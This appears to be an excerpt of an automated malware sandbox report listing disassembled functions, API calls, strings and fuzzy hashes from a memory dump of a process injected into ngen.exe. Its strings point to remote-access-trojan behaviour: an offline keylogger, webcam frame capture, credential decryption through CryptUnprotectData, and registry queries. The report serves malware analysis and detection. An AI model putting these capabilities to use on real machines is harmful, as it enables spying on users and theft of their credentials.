                                      • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                      • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      • Connection KeepAlive | Disabled, xrefs: 004050D9
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: Connection KeepAlive | Disabled
                                      • API String ID: 2993684571-3818284553
                                      • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                      • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                      • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                      • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                      • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                      • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                      • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                      • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                      • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                      • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                      • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                      • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                      • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                      APIs
                                      • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                        • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      • API String ID: 3469354165-3547787478
                                      • Opcode ID: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                      • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                      • Opcode Fuzzy Hash: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                      • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                      APIs
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                      • _free.LIBCMT ref: 00442318
                                      • _free.LIBCMT ref: 0044232F
                                      • _free.LIBCMT ref: 0044234E
                                      • _free.LIBCMT ref: 00442369
                                      • _free.LIBCMT ref: 00442380
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                      • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                      • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                      • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                      • _free.LIBCMT ref: 004468EC
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00446AB8
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                      • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                      • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                      • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                      APIs
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                        • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                        • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1735047541-0
                                      • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                      • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                      • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                      • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                      • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                      • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                      • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                      • __alloca_probe_16.LIBCMT ref: 0044E391
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                      • __freea.LIBCMT ref: 0044E3FD
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID:
                                      • API String ID: 313313983-0
                                      • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                      • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                      • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                      • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                      • _free.LIBCMT ref: 0044C59F
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                      • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                      • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                      • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                      APIs
                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                      • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                      • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                      • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                      • _free.LIBCMT ref: 004457E3
                                      • _free.LIBCMT ref: 0044580A
                                      • SetLastError.KERNEL32(00000000), ref: 00445817
                                      • SetLastError.KERNEL32(00000000), ref: 00445820
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                      • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                      • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                      • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                      APIs
                                      • _free.LIBCMT ref: 00441566
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00441578
                                      • _free.LIBCMT ref: 0044158B
                                      • _free.LIBCMT ref: 0044159C
                                      • _free.LIBCMT ref: 004415AD
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                      • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                      • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                      • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                      • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                      • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                      • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                      APIs
                                      • _strpbrk.LIBCMT ref: 0044B918
                                      • _free.LIBCMT ref: 0044BA35
                                        • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                        • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                                        • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
                                      • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                      • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                      • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                      • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0040189E
                                      • ExitThread.KERNEL32 ref: 004018D6
                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                        • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                      • String ID: 8:G
                                      • API String ID: 1649129571-405301104
                                      • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                      • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                      • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                      • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,00000104), ref: 00440975
                                      • _free.LIBCMT ref: 00440A40
                                      • _free.LIBCMT ref: 00440A4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                      • API String ID: 2506810119-4232439954
                                      • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                      • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                      • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                      • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                      APIs
                                        • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                        • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                        • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                      • _wcslen.LIBCMT ref: 00419744
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$program files (x86)\$program files\
                                      • API String ID: 37874593-1203593143
                                      • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                      • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                      • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                      • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                      • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                      • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                        • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                        • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                      • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                      • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                      • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                      • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                      • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                      • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                      • CloseHandle.KERNEL32(?), ref: 004051AA
                                      • SetEvent.KERNEL32(?), ref: 004051B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                      • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                      • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                      • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                      • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                      • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                      • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: origmsc
                                      • API String ID: 3677997916-68016026
                                      • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                      • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                      • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
